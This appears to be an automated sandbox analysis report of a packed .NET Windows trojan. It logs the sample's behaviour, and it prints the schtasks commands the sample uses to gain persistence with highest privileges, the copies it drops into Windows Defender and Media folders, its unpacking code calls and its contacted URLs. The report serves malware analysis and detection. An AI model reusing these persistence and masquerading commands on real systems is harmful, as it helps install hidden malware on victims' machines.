Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp.sprinthost.ru
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp.sprinthost.ru/auth/login
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://index.from.sh/pages/game.html

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File created: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File created: C:\Windows\Media\Sonata\wRRcPdViqk.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File created: C:\Windows\Media\Sonata\62cf92e5da7ec3	Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B88CC28	0_2_00007FFD9B88CC28
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B88C420	0_2_00007FFD9B88C420
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B894C40	0_2_00007FFD9B894C40
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B8833B0	0_2_00007FFD9B8833B0
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B88C230	0_2_00007FFD9B88C230
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B891090	0_2_00007FFD9B891090
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B88A68D	0_2_00007FFD9B88A68D
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B8935C8	0_2_00007FFD9B8935C8
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B894268	0_2_00007FFD9B894268
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B894100	0_2_00007FFD9B894100
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B889C9F	0_2_00007FFD9B889C9F
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 10_2_00007FFD9B8B3555	10_2_00007FFD9B8B3555
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 11_2_00007FFD9B891090	11_2_00007FFD9B891090
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 11_2_00007FFD9B88C230	11_2_00007FFD9B88C230
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 11_2_00007FFD9B88A131	11_2_00007FFD9B88A131
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 11_2_00007FFD9B88A68D	11_2_00007FFD9B88A68D
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 11_2_00007FFD9B887431	11_2_00007FFD9B887431
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 11_2_00007FFD9B883555	11_2_00007FFD9B883555
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 12_2_00007FFD9B8B7431	12_2_00007FFD9B8B7431
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 12_2_00007FFD9B8B3555	12_2_00007FFD9B8B3555
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 12_2_00007FFD9B8C1090	12_2_00007FFD9B8C1090

Source: QT4aLb3P98.exe	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: wRRcPdViqk.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: wRRcPdViqk.exe0.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: QT4aLb3P98.exe, 00000000.00000002.1687778525.0000000001770000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1687698529.0000000001740000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1688308009.000000001363F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000000.1668798576.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1687312608.000000000154F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1687312608.000000000154F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1687936780.0000000003315000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs QT4aLb3P98.exe

Source: QT4aLb3P98.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: QT4aLb3P98.exe, LWnyVJYJI3UvpfiEQ9Z.cs	Cryptographic APIs: 'TransformBlock'
Source: QT4aLb3P98.exe, LWnyVJYJI3UvpfiEQ9Z.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: QT4aLb3P98.exe, vAvRw3K4pP2OrHcG5JZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: QT4aLb3P98.exe, vAvRw3K4pP2OrHcG5JZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.QT4aLb3P98.exe.1740000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QT4aLb3P98.exe.1363f588.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QT4aLb3P98.exe.1770000.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QT4aLb3P98.exe.331e6c8.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@16/11@1/1

Source: C:\Users\user\Desktop\QT4aLb3P98.exe

File created: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe

Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\QT4aLb3P98.exe.log

Jump to behavior

Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Mutant created: NULL
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\491eb635c9cefa2a7c4721bdd3f84f9fc3429b6d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03

Source: C:\Users\user\Desktop\QT4aLb3P98.exe

File created: C:\Users\user\AppData\Local\Temp\wLOamAKQX5

Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat"

Source: QT4aLb3P98.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QT4aLb3P98.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\QT4aLb3P98.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: QT4aLb3P98.exe	ReversingLabs: Detection: 84%
Source: QT4aLb3P98.exe	Virustotal: Detection: 68%

Source: C:\Users\user\Desktop\QT4aLb3P98.exe

File read: C:\Users\user\Desktop\QT4aLb3P98.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\QT4aLb3P98.exe "C:\Users\user\Desktop\QT4aLb3P98.exe"
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqk" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 6 /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqk" /sc ONLOGON /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 11 /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe C:\Windows\Media\Sonata\wRRcPdViqk.exe
Source: unknown	Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe C:\Windows\Media\Sonata\wRRcPdViqk.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe "C:\Windows\Media\Sonata\wRRcPdViqk.exe"
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe "C:\Windows\Media\Sonata\wRRcPdViqk.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Directory created: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe			Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Directory created: C:\Program Files\Windows Defender\en-GB\62cf92e5da7ec3			Jump to behavior

Source: QT4aLb3P98.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QT4aLb3P98.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: QT4aLb3P98.exe

Static file information: File size 1170944 > 1048576

Source: QT4aLb3P98.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x11a400

Source: QT4aLb3P98.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: QT4aLb3P98.exe, vAvRw3K4pP2OrHcG5JZ.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: QT4aLb3P98.exe, ni3nO9Z0bNMZMdyGDZt.cs	.Net Code: qYNuj0iD7A System.AppDomain.Load(byte[])
Source: QT4aLb3P98.exe, ni3nO9Z0bNMZMdyGDZt.cs	.Net Code: qYNuj0iD7A System.Reflection.Assembly.Load(byte[])
Source: QT4aLb3P98.exe, ni3nO9Z0bNMZMdyGDZt.cs	.Net Code: qYNuj0iD7A

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B882BF8 pushad ; retf	0_2_00007FFD9B882C61
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B882C38 pushad ; retf	0_2_00007FFD9B882C61
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B882C58 pushad ; retf	0_2_00007FFD9B882C61
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B882C48 pushad ; retf	0_2_00007FFD9B882C61
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Code function: 0_2_00007FFD9B88DED8 pushfd ; retf	0_2_00007FFD9B88DED9
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 10_2_00007FFD9B8B2BF8 pushad ; retf	10_2_00007FFD9B8B2C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 10_2_00007FFD9B8B2C38 pushad ; retf	10_2_00007FFD9B8B2C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 10_2_00007FFD9B8B2C58 pushad ; retf	10_2_00007FFD9B8B2C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 10_2_00007FFD9B8B2C48 pushad ; retf	10_2_00007FFD9B8B2C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 10_2_00007FFD9B8BDED8 pushfd ; retf	10_2_00007FFD9B8BDED9
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 11_2_00007FFD9B88DED8 pushfd ; retf	11_2_00007FFD9B88DED9
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 11_2_00007FFD9B8A6060 push ebx; retn 000Fh	11_2_00007FFD9B8A64AA
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 11_2_00007FFD9B8A64CD push ebx; retn 000Fh	11_2_00007FFD9B8A64AA
